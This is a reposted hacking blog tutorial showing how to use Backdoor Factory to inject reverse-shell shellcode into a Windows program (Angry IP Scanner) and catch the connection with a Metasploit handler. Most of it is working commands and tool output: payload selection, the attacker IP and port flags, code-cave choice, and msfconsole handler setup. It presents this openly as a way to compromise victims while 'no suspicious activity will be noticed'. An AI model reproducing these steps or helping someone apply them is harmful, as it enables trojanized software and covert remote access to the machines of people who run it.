Backdoor-factory: howto
Sumber: http://www.khromozome.com/inject-payload-windows-backdoor-factory/
Backdoor factory – How to inject shell-code into windows application
Backdoor factory (BDF) is a pre-installed application in Kali Linux, its used to inject shell-code to any windows application. BDF can inject custom shell-code to an existing binary by adding malicious code in between the genuine source code. First it scans the entire binary and checks compatible payloads then it searches the entire code and displays available caves where our malicious code can reside without affecting the working of the application. Code caves are generated by compilers. A code compiler will have to pad certain areas of the binary and it does so by padding with a whole series of 0x00 bytes known as code caves. Backdoor factory overwrites those code caves with shell-code. We can choose any of the caves and make the executable.
The infected application will work as its intended but the shell-code will be executed in the background. No suspicious activity will be noticed by the normal user. This can target any windows system regardless of the version. This tool is being used by hackers to attack the victim other than the msfvenom payload generator. The working is same as the msfvenom payload, you need to setup reverse handler in msfcosole for a reverse connection and wait for the victim to connect back. Personally i prefer this method over the old windows hacking technique.
However this wont work on protected applications, most of the windows app is vulnerable to this attack. First of all you need to pick a light weight portable executable. Here im injecting code to “Angry IP scanner”. follow the steps . Video Demo
Step 1
Choose any application and use backdoor factory to check for available payloads
- backdoor-factory -f “application.exe” -s show
it will show up like this. root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s show Author: Joshua Pitts Email: the.midnite.runr[-at ]gmailcom Twitter: @midnite_runr IRC: freenode.net #BDFactoryVersion: 3.0.5[*] In the backdoor module [*] Checking if binary is supported [*] Gathering file info [*] Reading win32 entry instructions The following WinIntelPE32s are available: (use -s) cave_miner_inline iat_reverse_tcp_inline iat_reverse_tcp_inline_threaded iat_reverse_tcp_stager_threaded iat_user_supplied_shellcode_threaded meterpreter_reverse_https_threaded reverse_shell_tcp_inline reverse_tcp_stager_threaded user_supplied_shellcode_threaded root@anonymous:~/Desktop#
Step 2
now choose one of the shell-code and inject it into the executable with attacker IP and Port for reverse connection
- backdoor-factory -f “application.exe” -s reverse_shell_tcp_inline -H “attacker_IP” -P 444
root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s reverse_shell_tcp_inline -H 192.168.1.101 -P 444 -.(`-‘) (`-‘) _ <-.(`-‘) _(`-‘) (`-‘) __( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO ) ‘-‘—.\ / ,—. \-,—–.’-‘. ,–.\ .’_ (`-‘)—-. (`-‘)—-. ,——,) | .-. (/ | \ /`.\ | .–./| .’ /’`’-..__)( OO).-. ‘( OO).-. ‘| /`. ‘ | ‘-‘ `.) ‘-‘|_.’ | /_) (`-‘)| /)| | ‘ |( _) | | |( _) | | || |_.’ | | /`’. |(| .-. | || |OO )| . ‘ | | / : \| |)| | \| |)| || . .’ | ‘–‘ / | | | |(_’ ‘–‘\| |\ \| ‘-‘ / ‘ ‘-‘ ‘ ‘ ‘-‘ ‘| |\ \ `——‘ `–‘ `–‘ `—–‘`–‘ ‘–‘`——‘ `—–‘ `—–‘ `–‘ ‘–‘ (`-‘) _ (`-‘) (`-‘) .-> <-.(OO ) .-> (`-‘)—–./ ,—. \-,—–./ ‘._ (`-‘)—-. ,——,) ,–.’ ,-. (OO|(_\—‘| \ /`.\ | .–./|’–…__)( OO).-. ‘| /`. ‘(`-‘)’.’ / / | ‘–. ‘-‘|_.’ | /_) (`-‘)`–. .–‘( _) | | || |_.’ |(OO \ / \_) .–‘(| .-. | || |OO ) | | \| |)| || . .’ | / /) `| |_) | | | |(_’ ‘–‘\ | | ‘ ‘-‘ ‘| |\ \ `-/ /` `–‘ `–‘ `–‘ `—–‘ `–‘ `—–‘ `–‘ ‘–‘ `–‘Author: Joshua Pitts Email: the.midnite.runr[-at ]gmailcom Twitter: @midnite_runr IRC: freenode.net #BDFactoryVersion: 3.0.5[*] In the backdoor module [*] Checking if binary is supported [*] Gathering file info [*] Reading win32 entry instructions [*] Looking for and setting selected shellcode [*] Creating win32 resume execution stub [*] Looking for caves that will fit the minimum shellcode length of 366 [*] All caves lengths: 366
The following caves can be used to inject code and possibly continue execution.
- Don’t like what you see? Use jump, single, append, or ignore.**
[*] Cave 1 length as int: 366 [*] Available caves: 1. Section Name: None;Section Begin: None End: None; Cave begin:0x26c End: 0x3fc; Cave Size:400 2. Section Name: .text;Section Begin: 0x400 End: 0x4e00; Cave begin:0x4c30 End: 0x4dfc; Cave Size: 460 3. Section Name: .rdata;Section Begin: 0x5000 End: 0x5600; Cave begin:0x545e End: 0x55fc; Cave Size:414 4. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe398 End: 0xe580; Cave Size:488 5. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe598 End: 0xe784; Cave Size:492 6. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe79c End: 0xe984; Cave Size:488 7. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xe9a0 End: 0xeb84; Cave Size:484 8. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeba4 End: 0xed84; Cave Size:480 9. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xeda8 End: 0xef88; Cave Size:480 10. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xefac End: 0xf188; Cave Size:476 11. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf1ac End: 0xf388; Cave Size:476 12. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf3b0 End: 0xf588; Cave Size:472 13. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf5b4 End: 0xf78c; Cave Size:472 14. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf7b8 End: 0xf98c; Cave Size:468 15. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xf9bc End: 0xfb8c; Cave Size:464 16. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfbc0 End: 0xfd90; Cave Size:464 17. Section Name: .rsrc;Section Begin: 0x6200 End: 0x23000; Cave begin:0xfdc0 End: 0xff90; Cave Size:464 18. Section Name:.rsrc;Section Begin: 0x6200 End: 0x23000;Cave begin:0xffc4 End: 0x10190;Cave Size:460 19. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x101c8 End: 0x10390;Cave Size:456 20. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x10410 End: 0x10594;Cave Size:388 22. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x1e0a0 End: 0x1e2ec;Cave Size:588 23. Section Name:.rsrc;Section Begin:0x6200 End:0x23000;Cave begin:0x22e21 End: 0x22ffc;Cave Size:475
[!] Enter your selection:
All the available caves will be shown and will prompt for user input. Choose any cave.
[!] Enter your selection: 11
[!] Using selection: 11
[*] Changing flags for section: .rsrc
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File ip-scanner.exe is in the ‘backdoored’ directory
Step 3
The backdoored file will be generated in the “backdoor” folder. now you can setup msfcosole payload handler. Choose same payload,port,IP that you have chosen for BDF
- msfconsole
Wait for a minute, msfconsole will come up. Use handler then, set payload and port.
1. Handler msf> use multi/handler
2. set payload msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
3. Set local port msf exploit(handler) > set LPORT 444
4. Set local host msf exploit(handler) > set LHOST “attacker ip”
5. exploit msf exploit(handler) > exploit
Wait for the target to connect back msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.101:444 [*] Starting the payload handler… Step 4
Execute the binary in the target machine a shell will be pwned
As i mentioned before the executable will work fine and the code will be executed in the background. Watch the video for better idea. Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.
Any doubts or questions? Ask it on our new hackers Q and A forum askthehackers.com